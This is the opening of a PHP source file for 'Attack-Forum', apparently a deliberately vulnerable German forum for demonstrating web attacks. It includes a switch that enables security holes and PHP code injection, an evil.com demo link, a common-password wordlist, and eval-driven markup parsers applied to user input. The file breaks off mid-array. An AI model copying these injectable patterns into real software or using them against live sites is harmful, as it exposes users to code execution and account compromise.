Attack-Forum
<?php // charset=iso-8859-1 / tabs=8 / lines=cr+lf / GPL (c) 2019 by Michael Engelke
$config = 'xssconfig.php'; // Config-File für $cfg Variable
$title = 'Attack-Forum'; // Forum Titel (Text)
$cache = true; // Browsercache benutzen
$css = false; // Eigenes CSS (Url)
$logo = false; // Eigenes Logo (Url)
$icon = false; // Eigenes Favicon (Url)
$gast = false; // Schreibrechte für Gäste
$owbu = false; // Letztes Backup überschreiben
$svdb = true; // Datenbank bei Fehler/Zerstörung sichern
$imps = true; // Impressum im Menü anzeigen
$inet = true; // Ohne Zwangsanmeldung übers Internet
$user = true; // User neuanmeldung
$ipck = true; // Internet-Adressen per DNS prüfen
$craw = true; // WebCrawler indizierung
$leak = true; // Sicherheitslücken aktivieren ($leak=1 für PHP-Code-Injection)
$base = '.'.basename(__FILE__,'.php').'.'.((isset($bext)) ? $bext : 'sdb'); // SQLite-Datenbank
$home = './media'; // Localer Pfad um externe Links Offline verfügbar zumachen
# Harmlose Urls und Daten für die Attacken
$attack = array(
'_xlink_' => 'http://example.com',
'_glink_' => 'http://bing.de#/bing.html',
'_elink_' => 'http://evil.com#/evil.html',
'_flink_' => 'http://get.adobe.com/de/flashplayer/',
'_nlink_' => 'http://nyan-cat.com/nyan-cat-fly.swf',
'_clink_' => 'http://placekitten.com#/placekitten.php',
'_hlink_' => 'http://heise.de/security/#/security.html',
'_blink_' => 'http://mengelke.de/uploads/Projekte/AttackForum/banner.gif',
'_ylink_' => 'http://youtube.com/embed/XYME7SJi4R8?&autoplay=1#/rickrolling.html',// DLzxrzFCyOs, (Y1g2Cx03L2I)
'_bnlink_' => false, // $self/bnps.js
'_jsleak_' => "location.pathname", // "'http://localhost/xssforum.php'"
'_charlist_' => 'abcdefghijklmnopqrstuvwxyz',
'_wordlist_' => preg_replace(array('/^\s+|\s+$/','/\s+/'),array('',' '),'12 23 42 69 96 pi
*** 000 007 123 666 abc bob bot car cat cia fbi gay god
jim guy pie nsa sex **** 0000 1111 1234 baby ball bike boss dick
chef gott fuck ipad ipod jack john kitt lexy love mike nike pass sexy
shit test tits xbox ***** 00000 12345 54321 67890 09876 admin adobe alarm angel
apple buffy bundy chick elvis hallo hello jesus kitty motor nokia pussy robot spike
****** 000000 111111 123123 123456 53cr37 654321 666666 696969 abc123 access andrew ashley azerty
bailey batman beetle biteme buddha buster cherry daniel dragon ficken fuckme geheim george guitar
hallo1 harley hockey hunter iphone jordan joshua killer lovely master mobile monkey nicole qaywsx
qazwsx police qwerty qwertz ranger robert schatz secret shadow soccer summer thomas sweaty tigger
1234567 asshole beatles bigbobs bigdick bond007 charlie demo123 ferrari freedom fucking fuckoff fuckyou ironman
jessica lesbian letmein michael mustang nirvana pass123 patrick pokemon samsung test123 testing walmart welcome
******** 12345678 1q2w3e4r 1qay2wsx 1qaz2wsx babydoll babygirl
baseball butthead cencored computer football fussball hallo123
harddisk iloveyou jennifer kennwort kittycat lacrosse michelle
mohammed p455w0rd passw0rd password passwort princess pussycat
startrek starwars sunshine superman trustno1 usbdrive zensiert
123456789 1qa2ws3ed adminpass arschloch asdfghjkl cellphone metallica
microsoft password1 passwort1 raspberry schalke04 spiderman swordfish
webmaster 1234567890 lockerroom sexmachine uncencored sagichnicht administrator'));
# Sicherheitsfragen wenn das Kennwort vergessen wurde (Die Fragen sind aus der Praxis - Etwas umformuliert)
$pass = array(" Bitte Wählen...", "Was steht auf der Unterseite Ihrer Maus?",
"Wie war Ihr erstes Kennwort?", "Wie hieß Ihr Haustier in Ihrer Kindheit?",
"Wie heißt Ihr Lieblingsbuch?", "Wo haben sich Ihre Eltern kennengelernt?",
"Wie heißt Ihr Lieblingsfilm?", "In welcher Strasse sind Sie aufgewachsen?",
"Wie heißt Ihr Lieblingslied?", "Welchen Strand haben Sie zuerst betreten?",
"Wie hieß Ihr erster Vorgesetzter?", "Wie hieß Ihr Stofftier in Ihrer Kindheit?",
"Was war der Beruf Ihres Großvaters?", "Wo haben Sie Ihren Partner kennen gelernt?",
"Mit wem tranken Sie Ihr erstes Bier?", "Wie hieß Ihr erstes gekauftest Musikalbum?",
"Wie war der Mädchenname Ihrer Mutter?", "Wie hieß Ihr Bester Freund in Ihrer Kindheit?",
"Wie hieß Ihr erster Film ab 18 Jahren?", "Wie hieß die Stadt, in der Sie geboren wurden?",
"Wie heißt Ihre Lieblingssportmannschaft?", "Wie sind die letzten 4 Ziffern ihrer Kreditkarte?");
# Password-Hasher / HTML/ASCII entwerten / JavaScript komprimieren
$hash = array('sha1','http://pajhome.org.uk/crypt/md5/2.2/sha1-min.js','sha1_vm_test','hex_sha1'); // sha1 mit PHP & JavaScript
$html = array('&' => '&', '<' => '<', '>' => '>', '"' => '"', "'" => "'");
$uml = array('ä' => 'ä', 'ö' => 'ö', 'ü' => 'ü', 'ß' => 'ß', 'Ä' => 'Ä', 'Ö' => 'Ö', 'Ü' => 'Ü'); // ' ' => ' '
$js = '/(?<!else)\s*?\/\/\s[^\r\n]+\s* |(?<=\w)\s*(?=\s\w) |\s*[\r\n]+\s* |(?<=else\s)\s*(?=\w) |\s+(?=[\/][^\/])
|\s+(?=[!&(--:-?|]{1,2}) |(?<=[!&(--:-?|\/])\s+ |\s*(?=\{) |(?<=\{)\s* |;\s*(?=\}|<\\\\?\/|$)/ix';
$jschat = array( // JavaScript-Code für CryptChat
'prime' => 'SX5JX5ET7NYKTUHIA87AP57LZ76IOPL1Z9I1LOKG8WRKQUEVRJ136LQCQYRJR6E4HV0DEBXWX5143JJID1TAZ3MXMWNHZIVGPH0' // Prime 1024 Bit
.'VM87M06SUKH7707G1AEHK7OROB95TYSDN0DDC6OJVC4HC47OSEKUDBSIVUP0TSIYGAQPTBXRXBSPQOMENCNLSY8T3ZAA2D8ASGN',// in Base 36
'main' => false, // Globale Constante für den Diffie-Hellman Schlüsseltausch (false für Automatisch Generieren)
'base' => 36, // Basiswert der Zahlen (2-36)
'crypt' => array( // Verschiedene Scripte zur Verschlüsselung
'int' => 'http://peterolson.github.io/BigInteger.js/BigInteger.min.js', // http://silentmatt.com/biginteger/
'aes' => 'http://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js',// http://code.google.com/p/crypto-js/#AES
));
# Forum-Formatierungen
$creole = array(
'/(~?)\\\\x([89a-f][\da-f])|[$ ]|&(?!#?x?[\w-]+;)|(?<!~)~ /ie' => # Zeichen Entwerten & \x1f ('"&#".ord("$0").";"',)
'("$0" == "~ ") ? " " : (("$2") ? (("$1") ? substr("$0",1) : chr(hexdec("$2"))) : strtr(htmlentities("$0"),array("$" => "$")))',
'/(~?)(?:\<|<){3}(\w+)\s*(.*?)\s*(?:\>|>){3}/es' => # <<<x>>>
'("$1") ? strtr(substr(@"$0",1),array("<" => "<")) : ((isset($creoleph["$2"])) ? ((is_string($creoleph["$2"]))
? ((is_callable($creoleph["$2"])) ? $creoleph["$2"](@"$3") : $creoleph["$2"])
: preg_replace(array_keys($creoleph["$2"]),array_values($creoleph["$2"]),@"$3")) : (("$2" == "_") ? "" : @"$3"))',
'/\{\{\{\s*((?:[^{}]++|\{(?1)\})*|.*?)\s*\}\}\}/es' => # {{{ Vorformatiert }}}
'"<pre>".preg_replace(array("/(?<=&)([gl])t(?=;)/e",
"/\\\\\\\\\\\'|(&#?\w+;)|(?![\x80-\xff])[[:punct:]]|(?<=[a-z\d])[A-Z]/e","/\r?\n/"),array("((\"\\$1\" == \"l\") ? \"#60\"
: \"#62\")","((\"\\$1\") ? \"\\$1\" : \"&#\".ord(substr(\"\\$0\",-1)).\";\")","<br />"),"$1")."</pre>\r"',
'/(?:<|<)(\w+)(?:>|>).*?(?:<|<)\/\1(?:>|>)/se' => # <tag>html-light</tag>
'(($x = "$0" and $z = "\x5c") ? eval(\'while(preg_match(\\\'/(?:<|<)([bipqsu]|abbr|acronym|big|c(?:it|od)e|del|dfn|em|h[1-6]|ins'
.'|kbd|pre|samp|small|str(?:ike|ong)|su[bp]|tt|var)(?:>|>)(.+?)(?:<|<)\/\\\\1(?:>|>)/s\\\',$x,$y,PREG_OFFSET_CAPTURE))
$x = substr($x,0,$y[0][1])."<_{$y[1][0]}>{$y[2][0]}<_/{$y[1][0]}>".substr($x,$y[0][1] + strlen($y[0][0]));
return preg_replace("/(?<=<)_(?=\/?\w+>)|$z$z(?=[\\\'\"])/","",$x); \') : 0)',
'/(?:&(?:amp;)?|\?)#(0*(?:1(?:2[89]|[3-9]\d)|[2-9]\d\d|\d{4,})|x0*(?:[89a-f][\da-f]|[\da-f]{3,}));|\\\\u(?:\{(?=(?:\w+)\}))?([\da-f]+)\}?/ei' => # ģ / \u123
'("$1") ? "&#$1;" : "&#x$2;"',
'/(?:<|<)a\s[^>]*?href=\s*("|&\#39;|["\']?)((?:[^>&\s"\']|&(?!gt;))+)\1[^>]*?(?:>|>)\s*(.*?)\s*(?:<|<)\/a(?:>|>)/ie' => # <a href="link">text</a>
'\'<a href="$2" rel="nofollow" target="blank">\'.((\'$3\') ? \'$3\' : \'$2\').\'</a>\'',
'/(?:<|<)img[^>]*?src=\s*("|&\#39;|["\']?)((?:[^>\s&"\']|&(?!gt;))+)\1[^>]*?(?:>|>)/i' => # <img src="">
'<img src="$2" alt="$2" border="0" />',
'/^$/' => '', # -> Hier kommen die Smilies & Forum-Erweiterungen hin!
'/\[(\w+)[^\]]*\].*?\[\/\1\]/es' => # [bbcode=option]text[/bbcode]
'(($x = "$0") ? eval(\'while(preg_match(\\\'/\[(\w+)(?:=([^\]]+))?\](.*?)\[\/\\\\1\]/s\\\',$x,$y,PREG_OFFSET_CAPTURE)) {
$y = array($y[0],strtolower($y[1][0]),$y[2][0],$y[3][0]); if(preg_match("/^([ibus]|center)$/",$y[1])) {
$z = array("b"=>"strong", "i"=>"em", "u"=>"ins", "s"=>"del", "center"=>"center"); $z = "<{$z[$y[1]]}>$y[3]</{$z[$y[1]]}>"; }
elseif($y[1] == "list" and preg_match("/^[1ia]?$/i",$y[2]) and strstr($y[3],"[*]")) $z = strtr(($y[2] == "")
? "<ul>$y[3]</li></ul>" : (($y[2] == 1) ? "<ol>$y[3]</li></ol>" : "<ol type=\"$y[2]\">$y[3]</li></ol>"),array("[*]" => "<li>"));
elseif(preg_match("/left|right/",$y[1])) $z = "<div align=\"$y[1]\">$y[3]</div>";
elseif(preg_match("/^(font|color|size)$/",$y[1]) and preg_match("/^[\w&#;-]+$/",$y[2])) $z = "<font ".(($y[1] == "font")
? "face" : $y[1])."=\"$y[2]\">$y[3]</font>"; elseif($y[1] == "code") $z = "<pre>"
.preg_replace("/(?![&#;<>=\"\/])[[:punct:]]/e","\"&#\".ord(\"\\$0\").\";\"",$y[3])."</pre>"; elseif($y[1] == "img")
$z = "<img src=\"$y[3]\" alt=\"".basename($y[3])."\" border=\"0\">"; elseif(preg_match("/^(link|url)$/",$y[1]))
$z = "<a href=\"".str_replace(" ","%20",($y[2]) ? $y[2] : $y[3])."\" target=\"_blank\" rel=\"nofollow\">".((trim($y[3]))
? trim($y[3]) : $y[2])."</a>"; elseif($y[1] == "email") $z = "<a href=\"mailto:".rawurlencode(($y[2] != "") ? $y[2]
: $y[3])."\">".preg_replace("/(?![&#;<>=\"\/])[[:punct:]]/e","\"&#\".ord(\"\\$0\").\";\"",$y[3])."</a>";
elseif($y[1] == "quote") $z = "<blockquote>".(($y[2] != "") ? "<address>$y[2]</address>" : "")."$y[3]</blockquote>";
elseif($y[1] == "audio" and preg_match("/^(aac|mp[ag1-4]|m4a|og[ga]|wav|pcm)(;js)?$/",$y[2],$z))
$z = preg_replace(((isset($z[2])) ? "/^(.*)$/es" : "/^$/"),"\"<script type=\x27text/javascript\x27>document.write(\x27\"
.strtr(\"\$1\",array(\"/\" => \"\/\")).\"\x27);</script>\"","<audio autobuffer controls><source src=\"$y[3]\" type=\"audio/"
.preg_replace(array("/mp[123ag]/","/m4a/","/og[ga]/"),array("mpeg","mp4","ogg"),$z[1])."\" /><a href=\"$y[3]\">$y[3]</a></audio>");
elseif($y[1] == "video" and preg_match("/^(youtube|dailymotion|(mp4|ogg))(?:;(\d+)x(\d+))?(?:;(js|left|right))?$/",$y[2],$z)
and (preg_match("/^\w+$/",$y[3]) or $z[2])) $z = ($z[2]) ? preg_replace(((isset($z[5])) ? "/^(.*)$/es" : "/^$/"),
"\"<script type=\x27text/javascript\x27>document.write(\x27\".strtr(\"\$1\",array(\"/\" => \"\/\")).\"\x27);</script>\"",
"<video src=\"$y[3]\" type=\"video/".substr($z[2],-3)."\"".((isset($z[3])) ? " width=\"$z[3]\"" : "").((isset($z[4]))
? " height=\"$z[4]\"" : "").((preg_match("/#(.*)$/",$y[3],$z)) ? " poster=\"$z[1]\" preload=\"none\"" : "")
." autobuffer controls><a href=\"$y[3]\">".(($z) ? "<img src=\"$z[1]\" />" : $y[3])."</a></video>")
: "<iframe src=\"http://www.".strtr(strtr($z[1],array("youtube" => "youtube.com/embed/#", "dailymotion" =>
"dailymotion.com/embed/video/#")),array("#" => $y[3]))."\" width=\"".((isset($z[3])) ? $z[3] : 640)."\" height=\""
.((isset($z[4])) ? $z[4] : 480)."\"".((isset($z[5]) and $z[5] != "js") ? " align=\"$z[5]\"" : "")." frameborder=\"0\"></iframe>";
else $z = $y[3]; $x = substr($x,0,$y[0][1]).$z.substr($x,$y[0][1] + strlen($y[0][0])); } return $x; \') : 0)',
'/\[\[\[((?:[^\[\]]++|\[(?1)\])*|.*?)\]\]\]/es' => # [[[ Pre-Linebreaks ]]]
'preg_replace(array("/\\\\\\\\\\\\\\\\\r?\n/","/\r?\n/","/~([^~])/e"),array("","<br />","\"&#\".ord(\"\$1\").\";\""),"$1")',
'/(?<=^|\s)\/\*\s.*?\*\/(?=\s|$)|(?<!^|~)~\r?\n|^[ \t]+$/sm' => # /* Kommentar */
'',
'/^(([ \t].*([\r\n]+|$))+)/em' => # Vorformatiert
'"<pre>".preg_replace(array("/\\\\\\\\x5c+(?=[\'\"])/","/~(&#?\w+;|[^~])/e","/\s*[\r\n]+/"),array("","\"&#\"
.ord(html_entity_decode(\"\\$1\")).\";\"","<br />"),"$1")."</pre> "',
'/\?\?\s*(\w+)(?:\s*([:=])\s*(.+?))?\s*\?\?/e' => /* ??key=val?? / ??key?? */ 'eval(\'
return ($x = "$1" and $y = preg_replace("/\?(\w+)\??/e","((isset(\\\\$creolevar[\"_\$1\"])) ? \\\\$creolevar[\"_\$1\"]
: \"\$0\")","$3")) ? (($creolevar["_$x"] = $y and "$2" == "=") ? "" : $y) : ((isset($creolevar["_$x"])) ? $creolevar["_$x"]
: "");\')',
'/(?<=^|[\r\n])(~?)((={1,6})=*(&(?:[gl]t|#6[02]);|[<^>]?)\s*(?:%(\w+)%)?\s*(.+?)[\s=]*?(\[\[#\w+\]\]|#)?(?:\r?\n|$))/e' => # =Titel= [[#anker]]
'("$1") ? "$2" : ($x = (("$7" == "#") ? "[[#".preg_replace(array("/[^a-z\d]+/i","/^(?=\d+)/"),array("","al"),"$6")."]]"
: "$7"))."<h".strlen("$3").(("$4") ? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),
array("left","center","right")," align=\"$4\"") : "").(("$5") ? " class=\"$5\"" : "").">"
.($y = preg_replace("/(<.*?>)|(?![~&#;])([!-\/:-@\[-`\{-~])/es","(\"\\$1\") ? \"\\$1\" : \"&#\".ord(\"\\$2\").\";\"","$6"))
."</h".strlen("$3").">\r".(("$7" and $creolevar[".al"][substr($x,3,-2)] = $y) ? "" : "")',
'/(?<!@)@@(.*?)@@(?!@)/es' => # @@Fest@@
'"<code>".preg_replace(array("/\\\\\\\\x5c+(?=[\'\"])/","/~(&#?\w+;|[^~])/e"),
array("","\"&#\".ord(html_entity_decode(\"\\$1\")).\";\""),"$1")."</code> "',
'/(?<![!-]|[@\/.]xn)--(?!-)([^\r\n]+?)(?<!-)--(?!-)/' => # --Klein--
'<small>$1</small>',
'/(?<!~)~~(.+?)~~(?!~)/' => # ~~Durchgestrichen~~
'<del>$1</del>',
'/(?<!_)__(.+?)__(?!_)/' => # __Unterstrichen__
'<ins>$1</ins>',
'/(?<!#)##(?!\s)(.+?)(?<!\s)##(?!#)/' => # ##Druck##
'<tt>$1</tt>',
'/(?<!\^)\^\^(.+?)\^\^(?!\^)/' => # ^^Hoch^^
'<sup>$1</sup>',
'/(?<!,),,(.+?),,(?!,)/' => # ,,Tief,,
'<sub>$1</sub>',
'/\*\*(?!\s)((?:[^\n]*?(?<!\*)|(?<![\r\n]|\*\*)\r?\n(?!\r?\n|\*\*)){1,3})(?<!\s)\*\*/' => # **Fett**
'<strong>$1</strong>',
'/(?<!\{)\{\{(?!\{)\s*(&(?:[gl]t|#6[02]);|[<>]?)\s*([+-]?)\s*(?:%(\w+)%\s*)?(:|;|https?:|\/)?([^#|}<>]+)(?:#(\d+)[x*.-](\d+)|[^|}]*?)?\s*(?:\|\s*([^|}]*)(?:\|([^}]+))?)?\s*(?<!\})\}\}(?!\})/e' => # {{<>+-%class%Bild#width-height|Note|style}}
'preg_replace("/&(?!#?\w+;)/","&","<img ".(("$2") ? "class=\"$3\"" : "")."src=\"".(("$4" == ":") ? "http://" : (("$4" == ";") ? "https://" : "$4"))
.preg_replace("/[\s\x80-\xff]+/e","urlencode(\"\$0\")","$5")."\"".(("$6" and "$7") ? " width=\"$6\" height=\"$7\"" : "")
." alt=\"$8\" title=\"$8\" border=\"".(("$2" == "+") ? 1 : 0)."\"".(("$9") ? " style=\"$9\"" : "")
.(("$1") ? preg_replace(array("/<|&(lt|#60);/","/&(gt|#62);|>/"),array("left","right")," align=\"$1\"") : "")." />")',
'/(~|[&\#\w;]+(?<!-)-?)?\[\[\s*(\^|%\w+%\s*)?(?:([^\]]+)\s*-(?:\>|>|&\#62;)\s*)?(~?\(?(?:https?|ftp|mailto)?:|;|~?[\/\#])?([^|\]]+?)(?:\^([^|\]]+)\^)?(?:\s*\|\s*([^\]]+))?\s*\]\]((?:-?(?!-)[&\#\w;]+)+)?/e' => # pre[[%class%Link_~(url~)(?Versteckt)^Title^]]end / [[%class%Link^Title^|Text]] / [[%class% Text -> Link^Title^]]
'("$1" == "~") ? substr(@"$0",1) : "<a ".(("$2") ? "class=\"".(("$2" == "^") ? "home" : preg_replace("/\W+/","","$2"))."\" " : "")
.((preg_match("/^~?(http|:|;)/","$4")) ? "target=\"_blank\" rel=\"nofollow\" " : "").(("$6" != "") ? "title=\"$6\" "
: "").preg_replace("/&(?!#?\w+;)/","&",((substr("$4",0,1) == "#" && "$3$7" == "") ? "name=\"$5\">$1$8"
: (("$2" == "" and substr("$4",0,1) == "#") ? "class=\"anchor\" " : "")."href=\"".((substr("$4",0,1) == "~")
? (($x = preg_replace("/!!(.*?)!!/e","rawurlencode(\"\$1\")",substr("$4",1)."$5") and "$1$3$7$8") ? "$x\">$1$3$7$8"
: "$x\">$x"): preg_replace(array("/(?:[\\\\\\\\x5c~]([(+~)])|([\s\x80-\xff]+))/e","/&(?!amp;)#?x?\w+;/e","/[()]/"),
array("rawurlencode(\"\$1\$2\")","urlencode(html_entity_decode(\"\$0\",ENT_QUOTES))",""),(("$2$4" == "^")
? "$_SERVER[SCRIPT_NAME]/" : (("$4" == ":") ? "http://" : (("$4" == ";") ? "https://" : "$4")))."$5")."\"".">"
.((($x = (("$3$7" && "$3$7" != "+") ? "$1$3$7$8" : "$1"
.preg_replace("/(^(?=[^(]*\))|(?<![\\\\\\\\x5c~])\().+?((?<![\\\\\\\\x5c~])\)|$)|[\\\\\\\\x5c~](?![\\\\\\\\x5c~])|^[:;]/",
"","$4$5")."$8")) && "$3$7" == "+") ? preg_replace(array("/%[\da-f]{2}/ei",
"/[_+]|(?<=[[:lower:]\d])(?=[[:upper:]])|(?<=[^-\d])(?=\d[-\d]*( |$))|(?<=[[:upper:]])(?=[[:upper:]][[:lower:]\d])/u"),
array("urldecode(\'\$0\')"," "),$x) : $x)))."</a>")',
'/(?<![\w\/+])\+\+(.+?)\+\+(?![\w\/+])/' => # ++Groß++
'<big>$1</big>',
'/(?<!http:|https:|ftp:|[\w\/+])\/\/(?!\s)((?:[^\n]+?|(?<![\r\n]|\/\/)\r?\n(?!\r?\n|\/\/)){1,3})(?<!http:|https:|ftp:|\s)\/\/(?![\w\/+])/' => # //Kursiv//
'<em>$1</em>',
'/(?:^|(?<=[\r\n]))(~?)((?:[;:>]|>)(?:.*\r?\n(?=(?:[;:>\w]|>))|.*)+)/e' => /* # Definitionen */
'(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'if(!"$1"
and preg_match_all("/(?<=^|\s|\W)([;:]+)\s*((?:.*?(?=[\s\W][;:]|$)|(?<=\w)[;:])+)[ \t]*/s",
preg_replace(array("/(?<=^|\n)(>|>)+/e","/&(?!#?\w)/"),array("str_replace(array(\">\",\">\"),\":\",\"\$0\")","&"),
$x),$ay)) { $x = ""; $z = 0; foreach($ay[2] as $k => $v) { $w = strlen($ay[1][$k]) - $z;
$y = (substr($ay[1][$k],0,1) == ";") ? "t" : "d"; if($w > 0) { $u = 1; while($u++ < $w) { $x .= "<dd><dl>"; $z++; }}
elseif($w < 1) while($w++ < 1) { $x .= "</dl></dd>"; $z--; } $x .= "<d$y>".trim($v)."</d$y>"; } while($z--)
$x .= "</dl></dd>"; $x = "<dl>$x</dl>"; } return $x; \') : 0',
'/(?:^|(?<=[\r\n]))(~?)((?:\*|#)+(?![*#\r\n]).+?)(?=\r?\n(?![*#])|$)[ \t]*(?![*#])/es' => /* # Auflistung */
'(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'if(!"$1" and
preg_match_all("/^(\*+|#+)(?:([acdins])?(\d+)?(?<=\w)[*#])?\s*(.*?)\s*$/mi",preg_replace("/&(?!#?\w)/","&",$x),$ay)) {
$x = ""; $z = array(); foreach($ay[4] as $k => $v) { $w = strlen($ay[1][$k]) - count($z);
$y = (substr($ay[1][$k],0,1) == "*") ? "u" : "o"; if($w > 0) { $u = 1; while($u++ < $w) { $x .= "<dl><dd>"; $z[] = "dl"; }
$x .= "<{$y}l".(($ay[2][$k]) ? " type=\"".strtr($ay[2][$k], array("d" => "disc", "c" => "circle", "s" => "square",
"n" => "none"))."\"" : "").">"; $z[] = $y."l"; } elseif($w < 0) while($w++ < 0) $x .= (($u = array_pop($z)) == "dl")
? "</dd></dl>" : "</li></$u>"; if(end($z) != $y."l") { $x .= (($u = array_pop($z)) == "dl") ? "</dd></dl><{$y}l>"
: "</li></$u><{$y}l>"; $z[] = $y."l"; } $x .= "<li".(($ay[3][$k]) ? " value=\"{$ay[3][$k]}\"" : "").">$v"; }
while($u = array_pop($z)) $x .= ($u == "dl") ? "</dd></dl>" : "</li></$u>\r"; } return $x; \') : 0',
'/(?<=^|[\r\n])(~?)(\|.*?)(?=\n(?!\|)|$)[ \t]*(?!\|)/es' => /* | Tabelle | */ '(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'
if(!"$1" and preg_match_all("/^\|(.*?)\|?\s*$/m",preg_replace(array("/^\|[^=|\n]*\r?\n/","/&(?!#?\w)/"),
array("","&"),$x),$ay)) { foreach($ay[1] as $k => $v) { $ay[0][$k] = preg_split("/(?<!~)\|/",$v);
$ay[2][] = count($ay[0][$k]); $x = -1; foreach($ay[0][$k] as $u => $w) if($w != "") $x = $u; elseif($x >= 0 && $w == "") {
$ay[3][$k][$x] = (isset($ay[3][$k][$x])) ? $ay[3][$k][$x] + 1 : 1; unset($ay[0][$k][$u]); }}
if(count(array_unique($ay[2])) > 1 and $u = min($ay[2])) foreach($ay[0] as $k => $x) $ay[0][$k] = array_slice($x,0,$u);
foreach($ay[0] as $k => $trow) { $ay[1][$k] = "<tr>"; foreach($trow as $x => $tcell)
if(preg_match("/^(=?)([ \t]*)(.*?)([ \t]*)$/",$tcell,$v)) $ay[1][$k] .= "<t".(($v[1] != "") ? "h" : "d").((isset($ay[3][$k][$x]))
? " colspan=\"".($ay[3][$k][$x]+1)."\"" : "").(($v[2] != "" && $v[4] != "") ? " align=\"center\""
: (($v[2] != "" && $v[4] == "") ? " align=\"right\"" : (($v[2] == "" && $v[4] != "") ? " align=\"left\"" : ""))).">"
.preg_replace(array("/~\|/","/^_$/","/(?<!~)~-/"),array("|"," ","<br />"),$v[3])."</t".(($v[1] != "") ? "h" : "d").">";
$ay[1][$k] .= "</tr>"; } if(preg_match("/^\|\s*(&(?:[gl]t|#6[02]);|[<^>]?)\s*([-+])?\s*(?:%(\w+)%)?\s*(\d+%?)?\s*$/m","$2",
$v)) $v[1] = ((isset($v[1]) and $v[1]) ? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),
array("left","center","right")," align=\"$v[1]\"") : ""); return "<table ".((isset($v[3]) and $v[3]) ? "class=\"$v[3]\" "
: "")."border=\"".((isset($v[2]) and $v[2] == "-") ? 0 : 1)."\"".((isset($v[1])) ? $v[1] : "").((isset($v[4]) and $v[4])
? " width=\"$v[4]\"" : "").">".implode("",$ay[1])."</table>"; } return $x; \') : 0',
'/(~?)(?<!<|<)((?:\<|<){2}(\w+)\s*(.*?)\s*(?:\>|>){2})/e' => /* <<function ...>> */
'(@$x = array("$3",strtr("$4",array("\\\'" => "\'"))) and !"$1" and
preg_match_all("/(?:(\w+)=)?(?:(\'|&(?:amp;)?(?:#34|#39|quot);)(.*?)(?<!\\\\\x5c|\)\\\\\\\2|(\S+))|(\S+)|^$/",$x[1],$y)
and ((isset($creolepi[$x[0]]) and $x[2] = $creolepi[$x[0]] or 1) and !eval(\'while($z = each($y[3])) $y[(($y[1][$z[0]])) ? 6
: 7][$z[0]] = ($z[1]) ? $z[1] : $y[4][$z[0]]; if(isset($x[2]) and isset($x[2][1])) { $x[3] = (is_array($x[2])) ? $x[2][0]
: $x[2]; if(is_array($x[2][1])) { $x[4] = array_flip($y[1]); foreach($x[2][1] as $z) { if(isset($x[4][$z])) {
$x[5][$z] = $y[6][$x[4][$z]]; unset($y[6][$x[4][$z]]); } elseif(preg_match("/^(\w+)\?$/",$z,$y[8])) { $z = $y[8][1];
if(isset($x[4][$z])) { $x[5][$z] = $y[6][$x[4][$z]]; unset($y[6][$x[4][$z]]); } elseif($y[8] = each($y[7])) {
$x[5][$z] = $y[8][1]; unset($y[7][$y[8][0]]); }} elseif($y[8] = each($y[7])) { $x[5][$z] = $y[8][1];
unset($y[7][$y[8][0]]); } else { unset($x[5]); $x[2][1] = count($x[2][1]); break; }}} if(is_int($x[2][1]) and $x[2][1]
and count($y[0]) >= $x[2][1]) for($z=0;$z<$x[2][1];$z++) $x[5][$z] = (isset($y[6][$z])) ? $y[6][$z] : $y[7][$z]; }
if(isset($x[2][1]) and is_int($x[2][1]) and !$x[2][1] and count($y[0]) or !isset($x[2])) { for($z=0;$z<count($y[0]);$z++)
$x[5][$z] = ($y[3][$z]) ? $y[3][$z] : $y[4][$z]; $x[5] = array(implode(" ",$x[5])); } $z = (isset($x[5])) ? $x[5]
: ((isset($y[6])) ? $y[6] : false);\'))) ? eval(((isset($x[3]) and preg_match("/^\w+$/",$x[3]) and function_exists($x[3]))
? \'return ($z) ? @call_user_func_array($x[3],array_values($z)) : @$x[2]();\' : ((isset($x[3]) and preg_match("/[(\s;)]/",
$x[3]) and ((is_string($x[2])) or isset($x[5]))) ? $x[3] : \'return $z[0];\'))) : ""',
'/([~^]?)(?<=^|[\s~^]|[^\'"]>)((?:(?:s?ftp|http)s?:\/\/|(www\.))(?:[\w.-]+(?::[^\s@]+)@)?(?:\[[\da-f:]+\]|[\w.-]+)[\/?\#]?(?:[\w.\/:_?=&;\#%+-]*?(\.(?:bmp|bpg|gif|ico|jpe?g|jp?2k?|png|svg|webp))|[\w.\/:_?=&;\#%+-]*)|(?<=^|[~|^\s]|\\\\)((?:(?:[A-Z]+[a-z\d]+){2,8}|(?<=\^)\w+)(?:\#\w+)?)(?=\\\\|[\s,.!?~|]|$)|(?<!mailto:|["<\w])(\w[\w._\/-]*@[\w.-]+\.\w+))(?![^<]+<\/a>)/e' => # http://link / www.pic.jpg / mail@to.me / WikiLink
'("$1"=="~") ? strtr("$2",array(":"=>":","@"=>"@")) : preg_replace("/&(?!amp;)/","&",(("$4") ? "<img src=\""
.(("$3") ? "http://" : "")."$2\" alt=\"$2\" />" : "<a href=\"".(("$5") ? "$_SERVER[SCRIPT_NAME]/$2\" class=\"home\""
: (("$3") ? "http://" : (("$6") ? "mailto:" : ""))."$2\" rel=\"nofollow\" target=\"_blank\"").">$2</a>"))',
'/(?<=^|\n)----\r?\n?/' => "<hr />\r",
'/(~)?(\\\\{2})/e' => "('$1') ? '$2' : '<br />\r'",
'/\\\\\r?\n/' => "",
'/[\r\n]+--([\r\n]+|$)/' => "<br clear='all' />\r",
'/(\r?\n){3,}/' => "\r\n\r\n",
'/(\r?\n){2}/' => "<p><!----></p>\r",
);
$creoleph = array( // <<<Placeholder ...>>> # Frühzeitige Erweiterungen mit eigenen Regulären Ausdrücken / Addons
'cms' => array('/^\s*(\w+)\s*(\+?)$/e' => '(isset($creolevar["type"]) and preg_match("/^(cms|feed)$/",$creolevar["type"]))
? preg_replace(array("/[$]/","/~(?=(<|<){3})/"),array("$",""), $sql["sq"]($conn,"select ".(("$2") ? "description"
: "content")." from [cms] where name like \"$1\" and status/2%4 <= ".($status/2%2 + $status%2*2))) : ""'),
'comment'=> array('/.*/s' => ''),
'creole'=> array('/^([<^>]|&[lg]t;)?\s*(\d+%?)?\s*(@)?([+|-])?\s*(.+?)$/es' => '($x = array("$1","$2","$3","$4","$5",
